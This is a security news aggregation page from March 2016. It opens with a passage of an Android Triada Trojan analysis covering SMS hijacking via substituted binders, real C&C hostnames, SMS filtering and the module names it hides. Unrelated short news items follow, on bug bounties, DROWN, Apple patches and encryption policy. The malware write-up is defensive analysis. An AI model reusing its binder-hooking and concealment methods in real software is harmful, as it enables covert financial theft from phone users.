Registration of broadcast receivers for intents with the actions com.ops.sms.core.broadcast.responce.shield.status and com.ops.sms.core.broadcast.responce.sms.send.status, which simply set the corresponding variables to record the time of an event;
If a function is invoked from PISmsCore.invokeMMMain(), then a new thread is created. This thread enters an endless loop and turns on mobile network data, and won’t let the user turn it off.
The most interesting action among the above is the substitution of the system binders “isms” and “isms2”.

Binder is an Android-specific inter-process communication mechanism, and remote method invocation system. All communication between client and server applications within Binder pass through a special Linux device driver – /dev/binder. The scheme of inter-process communication via the Binder mechanism is presented below.

 

For example, when an application wants to send an SMS it calls the sendTextMessage (or sendMultipartTextMessage) function, which in fact leads to the transact() method of an “isms” (or “isms2”) binder object being called.

The transact() method is redefined in the malicious “isms” binder realization, replacing the original. So, when the parent application of the Trojan sends an SMS it leads to the call of the malicious transact() method.

In this method, the Trojan obtains SMS data (destination number, message text, service center number) from raw PDU. Then, if a network connection is available, it sends this data to a random C&C server from the following list:

bridgeph2.zgxuanhao.com:8088
bridgeph3.zgxuanhao.com:8088
bridgeph3.zgxuanhao.com:8088
bridgeph4.zgxuanhao.com:8088
bridgeph2.viewvogue.com:8088
bridgeph3.viewvogue.com:8088
bridgeph3.viewvogue.com:8088
bridgeph4.viewvogue.com:8088
The C&C server should respond with some data that, among other things, contains a new SMS destination address (number) and new SMS text.

If a network connection is not available, then the Trojan tries to find the appropriate data in the local configuration files that are stored in the /sdcard/Android/com/register/localuseinfo/ directory in encrypted form.

The Trojan then replaces the SMS destination address and the SMS text of the original message (obtained from C&C or local configuration files), and tries to send it in three different ways (simultaneously):

Via the standard Android API function sendTextMessage. It will lead to the same malicious transact() method of the Trojan “isms” binder realization;
By sending an intent with the action “com.ops.sms.core.broadcast.back.send.sms.address”. It will be received and processed by the same Trojan module but inside the “Messaging” or “Settings” application;
By passing the new SMS destination address and new SMS text to the original “isms” binder transact() method.
When the Trojan sends an SMS in one of these ways, it saves the new SMS destination address and new SMS text in a special variable. And, before sending the new SMS, it checks if it has not already been sent. This helps to prevent endless recursive calls of the transact() method, meaning only one SMS will be sent per originally sent message (by the parent application).

Besides the PISmsCore.initInstance() function, PISmsCore.invokeMMMain() calls another function – PIMMCrack.initInstance(). This method tries to determine which version of mm.sms.purchasesdk the host application is using (the Trojan knows for sure that the host application is using this SDK, because it has checked for libsmsiap.so, which is part of this SDK). mm.sms.purchasesdk is the SDK of Chinese origin – it is used by app developers for enabling In-App purchasing via SMS.

 

Thus, the mechanism described in this chapter allows the Trojan to modify outgoing SMS messages that are sent by other applications. We presume that the Trojan authors use this opportunity to secretly steal users’ money. For example, when a user buys something in some Android game shop, and if this game uses SDK for in-app purchases via SMS (such as mm.sms.purchasesdk), the Trojan’s authors are likely to modify the outgoing SMS so as to receive the user’s money instead of the game developers. The user doesn’t notice that his money has been stolen; instead he presumes he hasn’t received the appropriate content and will then complain to the game developers.

Filtration of incoming text messages

The original dispatchPdus() is used (as shown in the diagram below) to dispatch PDUs (Protocol Data Unit, low-level data entity used in many communication protocols) of incoming SMS messages to the corresponding broadcast intent. Then, all applications that subscribed for the intent are able to receive and process, according to their needs, the text message that is contained in the form of PDUs inside of this intent.

The function which substitutes dispatchPdus() invokes the moduleDispatchPdus() method from configpppl.jar. It checks the host application and if the application is not com.android.phone, it informs and broadcasts to all apps in the system intent with the action android.provider.Telephony.SMS_RECEIVED (along with the received PDUs). This standard intent informs all other applications (e.g. “Messaging” or “Hangouts” of the incoming SMS).

If the host for the malware is com.android.phone, then Triada checks the originating address and message body of the incoming SMS. The information that the Trojan needs to check is contained within two directories: /sdcard/Android/com/register/infowaitreceive/ and /sdcard/Android/com/register/historyInfo/. The names of the files that are stored in these directories contain postfix, which signifies the date and time of the last response from the C&C. If these files were updated earlier than the last response was received, the Trojan deletes these files and aborts the checking of the incoming SMS. Otherwise, the malware decrypts all the files from the directories mentioned above and extracts phone numbers and keywords from them to perform filtering. If the SMS was received from one of these numbers or the message contains at least one keyword, the Trojan broadcasts an intent with the action android.provider.Telephony.SMS_RECEIVEDcom.android.sms.core along with the message. This is an intent with a custom action and only those applications that explicitly subscribe to this intent, will receive it. There are no such applications on “clean” Android devices. In addition, this method could be used to organize “exclusive” message distribution for Triada modules. If some of the new modules subscribe to the intent with the action android.provider.Telephony.SMS_RECEIVEDcom.android.sms.core, they will receive the filtered message exclusively, without any other applications on the system knowing about it.

Concealing Trojan modules from the list of running services

This function is used to obtain a list of all running services. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getRunningServices():

com.android.system.google.server.info
com.android.system.guardianship.info.server
com.android.sys.op
com.android.system.op.
com.android.system.kylin.
com.android.kylines.
Concealing Trojan modules from the list of running applications

This function is used to obtain a list of all running applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getRunningAppProcesses():

com.android.system.google.server.info
com.android.system.guardianship.info.server
com.android.sys.op
com.android.system.op.
com.android.system.kylin.
com.android.kylines.
Concealing Trojan modules from the list of installed packages

This function is used to obtain a list of all installed packages for applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getInstalledPackages():

com.android.system.google.server.info
com.android.system.guardianship.info.server
com.android.sys.op
com.android.system.op.
com.android.system.kylin.
com.android.kylines.
Concealing Trojan modules from the list of installed applications

This function is used to obtain a list of all installed packages for applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getInstalledPackages():

com.android.system.google.server.info
com.android.system.guardianship.info.server
com.android.sys.op
com.android.system.op.
com.android.system.kylin.
com.android.kylines.
Conclusion

Applications that gain root access to a mobile device without the user’s knowledge can provide access to much more advanced and dangerous malware, in particular, to Triada, the most sophisticated mobile Trojans we know. Once Triada is on a device, it penetrates almost all the running processes, and continues to exist in the memory only. In addition, all separately running Trojan processes are hidden from the user and other applications. As a result, it is extremely difficult for both the user and antivirus solutions to detect and remove the Trojan.

The main function of the Trojan is to redirect financial SMS transactions when the user makes online payments to buy additional content in legitimate apps. The money goes to the attackers rather than to the software developer. Depending on whether or not the user gets the content he pays for, the Trojan either steals the money from the user (if the user does not receive the content) or from the legitimate software developers (if the user receives the content).

Triada has clearly been designed by cybercriminals who know the targeted mobile platform very well. The range of techniques used by the Trojan is not found in any other known mobile malware. The methods of concealing and achieving persistence used by Triada can effectively avoid detection and removal of all malware components after installation on the infected device; the modular architecture allows attackers to extend and alter the functionality so they are limited only by the capabilities of the operating system and applications installed on the device. Since the malware penetrates all applications installed on the system, the cybercriminals can potentially modify their logic to implement new attack vectors against users and maximize their profits.

Triada is as complex as any malware for Windows, which marks a kind of Rubicon in the evolution of threats targeting Android. Whereas previously, the majority of Trojans for the platform were relatively primitive, new threats with a high level of technical complexity have now come to the fore.


Hacknout Pentagon a dostat zaplaceno? Vojáci spouští bug bounty program

3.3.2016 Hacking

Nápady ze Silicon Valley má v rámci amerického ministerstva obrany prosazovat Eric Schmidt.
Ačkoliv plno technologií vzniká napřed pro armádu a pak se teprve dostane do běžného prodeje, v digitálním světě je situace přinejmenším vyrovnaná. Americká armáda chce posílit především v bezpečnosti. Kyberprostor je už prostě dalším bojištěm.

Eric Schmidt se stal hlavou nové pracovní skupiny s názvem Defense Innovation Advisory Board. Ta by měla pomoci Pentagonu vstřebat a nasát nápady ze Silicon Valley. Americká vláda tak zkouší to, o co se poslední dobou snaží i korporace.

Tento týden rozjely úřady vlastní bug bounty program s názvem Hack the Pentagon. V jeho rámci bude platit hackerům za objevení bezpečnostních děr v systémech ministerstva obrany. Kromě toho se často snaží naverbovat hackery, kteří by posílili jednotky pro boj v kyberprostoru.

TIP: Facebook loni hledačům chyb vyplatil skoro milion dolarů

Tím to jen začíná. Schmidtův jedenáctičlenný tým by měl podle informací CNN hledat problémy, se kterými se Pentagon potýká při používání technologií a přinášet rychlá řešení. Zároveň ale nebude mít přístup k vojenským datům.

Schmidt má s vládou dlouholeté zkušenosti. A ne zrovna pozitivní. V zásadě mu vadí, jak moc chtějí úřady strkat nos do databází firem ze Silicon Valley. Je dlouhodobým odpůrcem státního sběru dat a naposledy se připojil k Applu v kauze zablokovaného mobilu střelce ze San Bernardina.


Apple vydal záplatu záplaty. Po aktualizaci lidem přestal fungovat internet

3.3.2016 Zranitelnosti
Bezpečnostní experti uživatelům neustále radí, jak je důležité mít aktualizovaný operační systém, aby se do něj přes nalezené trhliny nedostali žádní nezvaní návštěvníci. Jenže všechny aktualizace se ne vždy povedou, jak se na vlastní kůži v minulých dnech přesvědčili uživatelé počítačů od Applu. Bezpečnostní záplata jim totiž zablokovala internetové připojení.
Problém se týkal uživatelů, kteří používají operační systém OS X El Capitan. Sluší se zmínit, že právě na této verzi funguje drtivá většina notebooků a stolních počítačů od amerického počítačového gigantu. Ten totiž vždy nejnovější verzi systémů nabízí uživatelům jako bezplatnou aktualizaci.

Na minulý týden byla pro El Capitana vydána bezpečnostní záplata, která opravovala chybu týkající se samotného jádra systému. Tu mohli kybernetičtí zločinci zneužít k propašování prakticky libovolného viru na napadený počítač, nebo jej na dálku klidně i ovládnout.

Oprava vyšla během pár dní
S instalací aktualizace tak většina uživatelů z pochopitelných důvodů neotálela. Problém však nastal po instalaci, přestalo totiž fungovat připojení k internetu prostřednictvím ethernetové zástrčky (klasického síťového rozhraní), upozornil server Security Week.

Programátoři amerického počítačového gigantu proto neváhali a během pár dní vydali záplatu záplaty. „Společnost Apple o víkendu vydala opravu bezpečnostní záplaty pro systém OS X El Capitan,“ uvedl bezpečnostní analytik Pavel Bašta z týmu Národního bezpečnostního týmu CSIRT.

Podle něj po instalaci nejnovější aktualizace začne internetové připojení opět fungovat.


Eset expanduje v západní Evropě, otevírá pobočku ve Velké Británii

3.3.2016 Zabezpečení
Během pěti let chce Eset zdvojnásobit lokální tým a výhledově se dostat mezi tři největší prodejce bezpečnostních řešení pro IT ve Velké Británii.

Otevření vlastní obchodní a distribuční pobočky ve Velké Británii navazuje na dlouholetou spolupráci s partnerskou společností DESlock. Společnost Eset provedla akvizici tohoto dodavatele šifrovacích řešení v roce 2015 a rozšířila tak své technologické portfolio.

„Věříme, že spojení lokálního týmu Eset UK s našimi globálními schopnostmi, know-how a zkušenostmi vytvoří dokonalou kombinaci, díky které posílíme naši pozici na britském trhu,“ říká Richard Marko, generální ředitel společnosti Eset. Dodavatel bezpečnostních řešení působí ve Velké Británii prostřednictvím partnerské společnosti DESlock přes deset let.

Pobočku Eset UK se sídlem v Bournemouthu na jihu Anglie povede obchodní a marketingový ředitel společnosti Eset pro region EMEA Miroslav Mikuš. Všichni zaměstnanci bývalého exkluzivního partnera se stávají zaměstnanci společnosti Eset. Ta očekává, že během následujících pěti let by se měl její tým ve Velké Británii přinejmenším zdvojnásobit.

„S týmem ve Velké Británii jsme zejména v posledních letech velmi úzce spolupracovali a velice nás těší, že můžeme tuto spolupráci posunout ještě dále, aby se značka bezpečnostních řešení od společnosti Eset stala atraktivnější jak pro domácnosti, tak pro firmy a běžné uživatele. Výhledově bychom se chtěli dostat mezi tři největší prodejce bezpečnostních řešení pro IT ve Velké Británii,“ říká Mikuš.

„Během prvního roku existence nové pobočky se zaměříme na rozšíření týmu, co nejkvalitnější technologickou podporu a komunikaci s prodejci, abychom v dlouhodobém horizontu optimalizovali naši partnerskou síť ve Velké Británii,” dodává Mikuš.

Vznik samostatné pobočky ve Velké Británii je součástí dlouhodobé strategie společnosti. Jejím cílem je posilovat pozici na tomto nejdůležitějším trhu s bezpečnostními řešeními pro IT v rámci regionu EMEA, aby si v prodejích i nadále udržela dvouciferný meziroční růst.

V Evropské unii provozuje Eset již osm poboček a výzkumných a vývojových center. Otevření britské pobočky následuje po zřízení zastoupení společnosti Eset v Německu, ke kterému došlo v roce 2013.


Hack the Pentagon — US Government Challenges Hackers to Break its Security
3.3.2016 Hacking
The United States Department of Defense (DoD) has the plan to boost their internal and network security by announcing what it calls "the first cyber Bug Bounty Program in the history of the federal government," officially inviting hackers to take up the challenge.
Dubbed "Hack the Pentagon," the bug bounty program invites the hackers and security researchers only from the United States to target its networks as well as the public faced websites which are registered under DoD.
The bug bounty program will begin in April 2016, and the participants could win money (cash rewards) as well as recognition for their work, DoD says.
While announcing 'Hack the Pentagon' initiative during a conference, DoD said only "Vetted Hackers" can participate in the Bug Bounty program, which means the candidates need to undergo a Background Check after registration and before finding vulnerabilities in its systems.
Moreover, candidates would be given a Predetermined Department Systems (might be real system alike) for a specific time period of the competition to access it.
So, don’t be confuse that the DoD will serve a critical piece of its infrastructure to hackers for disruption, rather the hackers will be allowed to target a predetermined system that is not part of its critical operations.
However, the Department of Defense has not yet confirmed what bounty would be provided to hackers upon a successful penetration of its network or web pages.
Why DoD launches a Bug Bounty program?
Department of Defence currently manages 488 websites related to everything from the 111th Attack Wing, several military units to Yellow Ribbon Reintegration Program.
According to Chris Lynch, Director of Defense Digital Service that’s actually behind the "Hack the Pentagon" initiative:
"Bringing in the best talent, technology and processes from the private sector not only helps us deliver comprehensive, more secure solutions to the DoD, but it also helps us better protect our country."
But, Here's the Actual Reason You Need to Know:
The hackers, foreign and internal criminals, are actively targeting government departments and critical infrastructure that could reveal national secrets.
Last year’s massive security breach in the United States Office of Personnel Management (OPM) revealed the private information of over 21.5 Million US government employees.
Just last month, an unknown hacker released personal details of at least 20,000 Federal Bureau of Investigation (FBI) agents and 9,000 Department of Homeland Security (DHS) officers.
Almost three years ago, the Pentagon said the Chinese government had conducted cyber attacks on the several United States diplomatic, economic as well as defense industry networks.
Therefore, the real purpose of launching dedicated bug bounty program for hackers could be a government initiative to identify vulnerabilities in its infrastructure that may expose any endangered state secrets.
Just like Bug Bounty programs offered by several Frontliners in the technology industry, Hack The Pentagon would also be an exercise for the federal authorities to boost up the security measures and counter the cyber attacks.
Instead of usual self-conducting Security Audit by the DoD internals itself, the new initiative would provide an opportunity for the fresh brains outside the Pentagon to challenge DoD infrastructure and enhance the security measures.


$17 smartwatch includes a backdoor in the pairing app
3.3.2016 Safety

A group of researchers that analyzed security of a number of smart watches discovered a $17 smartwatch is sold with a backdoor in the pairing app.
Be careful of cheap smartwatch offered on the web, security researchers at Mobile Iron have found that the U8 Smartwatch available on eBay for sale is offered with an Android or iOS app that contains a backdoor that is linked to a Chinese IP address.

The discovery was presented at the BSides San Francisco conference and of course, the wearable device represents a serious threat to the users’ privacy.

The U8 smartwatch is offered on eBay for 15,99 Euro (just US$17), the buyers download the pairing app from an IP address reported on a piece of paper that comes with the device.

The smartwatch has 1.48″ touch screen and Bluetooth connectivity to mobile devices to control calls by using an Android app that can access the user’s contacts, call and SMS histories.

Mobile Iron research director Michael Raggo told the BSides San Francisco conference the watch is a threat to individual and enterprise security.

Smartwartch threat

The U8 Smartwatch is only one of the list of devices analyzed by Raggo and his colleagues, including the Apple Watch running the WatchOS, the Samsung Gear 2 running Samsung Tizen, and the Moto 360.

U8 Smartwatch

“We ran dynamic and behavioural analysis (on the pairing app) and discovered that when it was paired, it started communicating outbound over a random IP address to China,” explained the Mobile Iron research director Michael Raggo (@datahiding)

“We don’t know what the IP address is. “In terms of corporate espionage, in terms of risk, there’s definitely a lot of suspicious behaviours there.”

Raggo has developed a Python tool called SWATtack tool that could be used for forensics analysis and vulnerability assessment on the smartwatches. The tool is also able to bypass PIN protection implemented on Samsung Gear 2 Neo watches and exfiltrate data.


Can Scientists 'Upload Knowledge' Directly into your Brain to Teach New Skills?
3.3.2016 Safety
Imagine the world where you do not have to make any efforts to learn new skills or knowledge.
Just like new programs are uploaded to a Robot to teach them new skills, What if new skills are uploaded to your brain to make you learn, say, playing Guitar, a whole language like French or German or anything else you wish?
Do you want a technique, if exists, to make this possible?
Of course, YES! Who would not?
Now, multiple media channels are reporting that a team of researchers from HRL Laboratories in California has developed a new technology that could be used to feed any skill into the human brain without much effort.
But, Is it possible in reality?
Let's have a look at what media is reporting and what scientists have actually discovered.
Here's what Media is Reporting:
Media is reporting that researchers have found a way to "upload knowledge to your brain." Researchers claimed to have developed a simulator that can feed data directly into a human’s brain to teach new skills in a shorter amount of time.
Some are reporting that the technique is similar to that seen in 'The Matrix,' in which Keanu Reeves learns 'Kung-Fu' soon after a program is uploaded directly into his brain through a terminal.
Here's what Scientists have Actually Discovered:
In reality, the recent research shows that it may be possible to enhance a human's existing ability to learn new skills, but to upload any particular skill or talent directly into a person via brain waves is outside the scope of the study.
What Did the Scientists Actually Achieve?
Lead by Matthew Phillips, the HRL Labs research team that does R&D for the Boeing Company and General Motors has made use of a neuro-stimulation technique called transcranial Direct Current Stimulation (tDCS) – a noninvasive, painless shock that makes use of a constant, small electric current to excite specific brain regions.
Using tDCS technique, the researchers excited certain areas in the human brain that are responsible for learning and skill retention.
"When you learn something, your brain physically changes," Philips said. "Connections are made and strengthened in a process called neuroplasticity. It turns out that certain functions of the brain, like speech and memory, are located in very specific regions of the brain, about the size of your pinky."
During their experiment, the researchers first monitored the brain waves of 6 commercial as well as military pilots and then transmitted those patterns into 32 newbies who were learning to pilot an aeroplane in a flight simulator.
The finding suggests that tDCS technique might work to enhance a person's ability to learn, as the newbies who received tDCS brain stimulation were found with improved piloting abilities, especially landing skills.
However, this definitely does not mean that the researchers uploaded or transmitted any particular skill or type of data via this technique, rather they just excited the specific brain regions responsible for learning, so that a person could improve his/her learning ability.
So, don’t think that using this new technique you could "upload" an entire skill set, like Kung-Fu or French language. For now, you have to make efforts to learn them but, who knows, the study could just be a first step towards this whole new FUTURE.
For in-depth knowledge, you can read the full research paper published in the journal Frontiers in Human Neuroscience.


Turing Award — Inventors of Modern Cryptography Win $1 Million Cash Prize
3.3.2016 Safety
And the Winners of this year's Turing Award are: Whitfield Diffie and Martin E. Hellman.
The former chief security officer at Sun Microsystems Whitfield Diffie and the professor at Stanford University Martin E. Hellman won the 2015 ACM Turing Award, which is frequently described as the "Nobel Prize of Computing".
Turing Award named after Alan M. Turing, the British mathematician and computer scientist who was a key contributor to the Allied cryptanalysis of the German Enigma cipher and the German "Tunny" encoding machine in World War II.
The Association for Computing Machinery (ACM) announced the Turing Award the same day when FBI Director James Comey appeared before a congressional committee to discuss how encryption has become Threat to law enforcement.
The ACM announced the award on Tuesday, which includes the top prize of $1 Million that has been awarded to two men who invented the "public-key cryptography" – a technique that makes possible the commercial World Wide Web.
"Today, the subject of encryption dominates the media, is viewed as a matter of national security, impacts government-private sector relations, and attracts billions of dollars in research and development," ACM President Alexander Wolf said in a statement.
"In 1976, Diffie and Hellman imagined a future where people would regularly communicate through electronic networks and be vulnerable to having their communications stolen or altered. Now, after nearly 40 years, we see that their forecasts were remarkably prescient."
Diffie and Hellman published their landmark paper titled, New Directions in Cryptography [PDF] in 1976, outlining the first public-key cryptography (or asymmetric cryptography) technique to allow people to encrypt their data using publicly exchanged keys and decrypt the data using their secret private keys.
The technique led to a revolution in the encryption, and the Diffie-Hellman key exchange protocol became central to almost all modern cryptography, including PGP (Pretty Good Privacy) encrypted e-mail, TLS (Transport Layer Security), and more.
What is Diffie-Hellman Public-key Cryptography?
Public-key cryptography is a method of encrypting data in which each party has a pair of keys – one is a freely shareable public key, and the other is a secret private key – thus eliminating the historical key management issue.
The historical method required both sender and recipient of an encrypted message had to use the same key. So in case, that key was stolen or compromised, every encrypted message sent could be read using the key.
"Naturally I'm thrilled by this by this award, but thrilled for cryptography," Diffie said. "It's the third time the Turing award has been given to cryptographers. The fact that it is so central to the field is amazing."
And Hellman said, "The award is a great honor, but I feel very proud because it was named after Alan Turing, a man who was persecuted as we were."
The two inventors of modern cryptography will share the prize money of $1 Million. Though the ACM has just announced the award at the RSA 2016 conference, it will present the 2015 Turing Award at its annual Awards Banquet on June 11, 2016, in San Francisco, California.


France could Fine Apple $1 Million for each iPhone it Refuses to Unlock
3.3.2016 Apple
The United States is not the only one where Apple is battling with the federal authorities over iPhone encryption. Apple could face $1 Million in Fine each time the company refused to unlock an iPhone in France.
Despite its victory in a New York court yesterday, Apple may not be so successful elsewhere in fighting against federal authorities over iPhone encryption battle.
Yann Galut, a member of France’s Socialist Party, has submitted an amendment to a bill aimed at strengthening the French government’s ability to fight against terrorism — by arguing that…
Apple should pay a Million Euro ($1.08 Million) fine for every iPhone Apple refuses to unlock when asked to by law enforcement, The Local reported.
The same €1 Million penalty could apply to Google as well under similar conditions, forcing the tech companies to help its investigators extract data from a suspect’s smartphone in terrorism cases.
The French police seized eight smartphones last year in terror investigations, but the authorities were unable to access them. With Apple and other tech companies unwilling to help the authorities, France wants to enforce new laws to force tech companies to comply with orders.
"We are faced with a legal vacuum when it comes to data encryption, and it’s blocking judicial investigations," Galut told Le Parisien.
"Only money will force these extremely powerful companies like Apple and Google to comply. They are hiding behind a supposed privacy protection, but they’re quick to make commercial use of personal data that they’re collecting."
Apple continues to battle against the Federal Bureau of Investigation (FBI) over a court order to help the agency unlock an iPhone 5C belonging to San Bernardino shooter Syed Farook.
Other Silicon Valley giants, including Google, Facebook, WhatsApp and Twitter, defended Apple CEO Tim Cook’s stance against the FBI in the controversial San Bernardino case and the need for strong protections built into smartphone devices.
Although it remains to be seen whether this proposed law will be approved, how the San Bernardino case is resolved in the United States will definitely impact how other countries might approach the tech giants.


French Gov could fine Apple and Google €1m unless they hack mobile devices
3.3.2016 Apple

French Gov is thinking a law that would impose fines of €1 million on Apple and Google if they refused providing access users’data.
Governments worldwide continue to intensify their pressure on the IT giants requesting the access to users’ data in the name of security.

The US Government wants Apple unlock its mobile devices to access data, the Brazilian Government arrested the Facebook Latin America VP because the company refused to provide access to WhatsApp data to law enforcement in drug trafficking investigation.

The United States is not the only one where Apple is battling with the federal authorities over iPhone encryption.The last Government in order of time that is threatening IT giants is the French one, according to The Local website, Apple in fact could face $1 Million in fine each time it refused to unlock an iPhone in France.

French Gov iphones Sand Bernardino shooter case

The same penalty could apply to Google if the company refuses to give access users’ data to the French authorities.
A member of French Socialist Party, Yann Galut, has submitted an amendment to a bill aimed at strengthening the French government’s ability to fight against terrorism.

“On Monday, French Socialist MP Yann Galut proposed an amendment to French law that – if passed – would see the US companies punished if they didn’t give French officials backdoor access to terrorists’ phones. ” states The Local website

“Galut said on Monday that companies like Apple and Google should be fined up to €1 million when they didn’t cooperate in such cases. “

“We are faced with a legal vacuum when it comes to data encryption, and it’s blocking judicial investigations,” Galut told Le Parisien.

“Only money will force these extremely powerful companies like Apple and Google to comply. They are hiding behind a supposed privacy protection, but they’re quick to make commercial use of personal data that they’re collecting.”

Galut sustains that the punishment aims to discourage companies that were operating under “total bad faith”.

The French law enforcement seized eight mobile last year in investigations on suspects for terrorism, in all the cases the police was not able to access their content. The response of the France Government is a new law framework to oblige IT companies to comply with court orders.

The IT giants, including Google, Facebook, Twitter and WhatsApp, sided with Apple against the request of the US Government in the San Bernardino case.

Let’s wait for the final judgement on the case.


RSA Conference Badge Scanning App has a default password hardcoded
3.3.2016 Security

Researchers at Bluebox Security discovered that the badge scanning application used at the RSA Conference 2016 includes a hardcoded default password.
This year participants at the 2016 RSA Conference will have an ugly surprise, many vendors were provided with Samsung Galaxy S4 smartphones that run a special Android app, available on the Google Play, that allows them to keep track of visitors by scanning their badges.

The mobile scanning cannot be used for anything except scanning badges, unless the administrator unlocks it using a password. This working mode is also note as “kiosk mode.”

Security experts at Bluebox Security downloaded analyzed the scanning app and discovered that authors embedded the default password in the source code in plain text.

“When we used that passcode we were able to gain access to the kiosk app’s settings. This, in turn, let us gain access to the device’s system settings, which then enabled us to put the device into developer mode to gain full access to the device,” Bluebox Security researchers told Securityweek.com. “This is concerning because if we can do this, an attacker can too, letting them root the device, pull any data off of it, or install malware to steal even more data.”

“We speculate that the default code embedded in the app is there as a mechanism so that the device can still be managed even if the admin’s custom passcode is lost. However, it is a poor developer practice to embed passwords into an app’s shipped code, especially un-encrypted and un-obfuscated,” experts noted.

RSA Conference 2016

In this specific there aren’t serious risks for end-users, but it is quite common find mobile apps with hardcoded credentials. Hackers could exploit the embedded password to gain control of the device, at that point it a joke use it to spy on victims or to recruit is in a mobile botnet.

Something similar has already happened in 2014 when experts at IOActive uncovered a number of flaws affecting the RSA Conference Android app, such as information disclosure issues.

Security by design have to be a must for mobile app development, unfortunately due to the rapid diffusion of Rapid Application Mobile Development Tools is it quite easy to publish a mobile app, but in most cases the security requirements are totally ignored.

It is curious that this thing happened at a conference followed by most important experts in the security field.


Apple opravuje chyby v Apple TV. Útočníci přes ni mohli tahat data

2.3.2016 Zranitelnosti
Zhruba 60 chyb opravila společnost Apple ve své chytré krabičce pro „hloupé televize“ Apple TV. Chyby se nahromadily i proto, že firma přistoupila k updatu systému poprvé od loňského dubna. Nová verze systému třetí generace má označení 7.2.1. Firma vydala i dvě záplaty pro čtvrtou generaci Apple TV, která běží na systému tvOS.

Jak píše server Security Week, některé chyby jsou tak závažné, že je mohli útočníci zneužít k spuštění závadného kódu nebo ukradení informací. Stejné chyby, jaké mají aplikace v Apple TV, přitom již firma řešila u stejných aplikací v jiných operačních systémech.


Útok DROWN využívá staré chyby v SSLv2

2.3.2016 Počítačový útok
Informace o útoku nazvaném DROWN (Decrypting RSA with Obsolete and Weakened eNcryption) zveřejnil mezinárodní výzkumný tým 1. března. Využívá 17 let staré chyby v dnes již překonaném, ale stále používaném protokolu SSLv2.

„Jde o vážnou zranitelnost, která se dotýká protokolu HTTPS a dalších služeb závisejících na SSL a TLS, tedy klíčových šifrovacích protokolů nezbytných pro zabezpečení na internetu,“ uvádí autoři studie (dostupná v PDF). „Zranitelné mohou být webové stránky, mailové servery a jiné služby, které protokol TLS využívají,“ dodává český Národní bezpečnostní tým.

Zranitelné jsou ty servery, které:

povolují zastaralý protokol SSLv2
využívají klíč, který je zároveň využit serverem povolujícím SSLv2
Princip útoku DROWN
Princip útoku DROWN: Útočník napadne server požadavky SSLv2 a získá tak údaje, které využije k dekódování dat oběti přenášených přes TLS.Ohrožené jsou servery, které využívají TLS i SSLv2 protokoly, nebo servery, které používají SSLv2 protokol a sdílí klíč s jiným TLS serverem. Celkem je tak zranitelných 33 % webových serverů.
Zobrazit galerii

Podle odhadu autorů je zasažena čtvrtina až třetina všech internetových serverů. „Tento problém je srovnatelný s chybou Heartbleed (více o Heartbleed zde). I v tomto případě může dojít k dešifrování komunikace,“ uvedla pro Technet.cz Zuzana Duračinská, bezpečnostní analytička sdružení CZ.NIC.

Po celém světě jsou zranitelné miliony serverů. V České republice jsou to tisíce. „Podle informací, které jsme včera obdrželi, se problém týká téměř třinácti tisíc IP adres,“ řekla Duračinská. „Všechny provozovatele těchto adres jsme již o tomto problému informovali.“

Řešení: okamžité i dlouhodobé
Každý provozovatel webových serverů si může ověřit, zda je jeho server napadnutelný útokem DROWN. Nejjednodušší ochranou je zakázat protokol SSLv2 na všech serverech. Některé webové servery (např. Microsoft IIS od verze 7.0) a knihovny (např. OpenSSL od verze 1.0.2g) jsou takto již nastavené, u jiných je potřeba toto nastavení upravit.

Uživatelé nemohou pro svou ochranu v tuto chvíli udělat nic, na straně klienta není proti útoku DROWN obrany. Maximálně se mohou vyhýbat serverům, které nejsou zabezpečené. To nám potvrdila i Duračinská: „Na straně uživatelů bohužel není možné se jakkoliv bránit. Potřebná opatření musí udělat dotčení provozovatelé služeb.“

Ohrožené jsou servery, které využívají TLS i SSLv2 protokoly, nebo servery, které používají SSLv2 protokol a sdílí klíč s jiným TLS serverem. Celkem je tak zranitelných 33 % webových serverů.
Dlouhodobé řešení vidí autoři studie v pečlivém zavírání bezpečnostních chyb, odstřihávání zastaralých protokolů a knihoven a omezení opakovaného využívání bezpečnostních klíčů. V současné době ale podle nich „finanční politika certifikačních autorit povzbuzuje firmy k tomu, aby si nakoupily nejmenší možný počet bezpečnostních certifikátů.“


Hacking Team, který dodává sledovací nástroje vládám je zpět. Experti objevili nový malware pro OS X
2.3.2016 Zdroj: Živě 
Viry
Hacking Team je italskou společností, která mimo jiné provozuje malware-as-service. V rámci služeb tedy nabízí třeba sledování pro soukromé subjekty, ale i státní orgány. Minulý rok jsme o něm psali v souvislosti s únikem dat, který odhalil, že si služby Hacking Teamu platí i česká policie. Od té doby se zdála být činnost společnosti utlumená. Nyní však experti objevili nový vzorek malwaru pro OS X, za nímž s největší pravděpodobností rovněž stojí nechvalně proslulí Italové.

Škodlivý kód byl nalezen prostřednictvím služby VirusTotal patřící Googlu, která se stará o online kontrolu souborů. Obsahuje celkem 56 antivirových služeb, které nahraný soubor překontrolují. V době psaní článku vyhodnotilo tento soubor jako malware 19 služeb a například McAfee nebo Security Essentials od Microsoftu jej považují za bezpečný.

blockblock.png
V infikovaném OS X se nachází složka ~/Library/Preferences/8pHbqThW/ a v ní soubor Bs-V7qIU.cYL (zdroj: Patrick Wardle)

O analýzu se postaral expert na reverzní inženýrství Pedro Vilaça. Ten našel v kódu jasné stopy vedoucí k předchozím vzorkům Hacking Teamu. Především potom ve způsobech, které jsou využité pro skrytí malwaru v systému. Samozřejmě existuje šance, že jiná skupina nebo hacker využil uniklých kódů Hacking Teamu a postavil na nich vlastní malware. Pravděpodobnost je však velmi nízká, neboť i IP adresy vedoucí z aktuálního vzorku souvisí s italskou společností.


Kanye West, Who wants to destroy ‘The Pirate Bay’, Caught using Torrent Site
2.3.2016 Safety
The 38-year-old rapper Kanye West is at the centre of controversy once again.
West is himself a Pirate Lover just like everyone else, and he proved it today by sharing a photo of his laptop screen on Twitter.
The rapper tweeted an ill-judged picture on Tuesday night to show what he was listening to on YouTube (Sufjan Stevens’ 'Death With Dignity' song), but his fans discovered something he would have hide if realized before sharing that snap.
Taking a closer look at the address bar was quite revealing, showing two very interesting tabs:
The notorious file-sharing website The Pirate Bay
MediaDownloader
Pirate Bay Offers Tech Support to Kanye West
kanye-west-torrent-pirate-bay
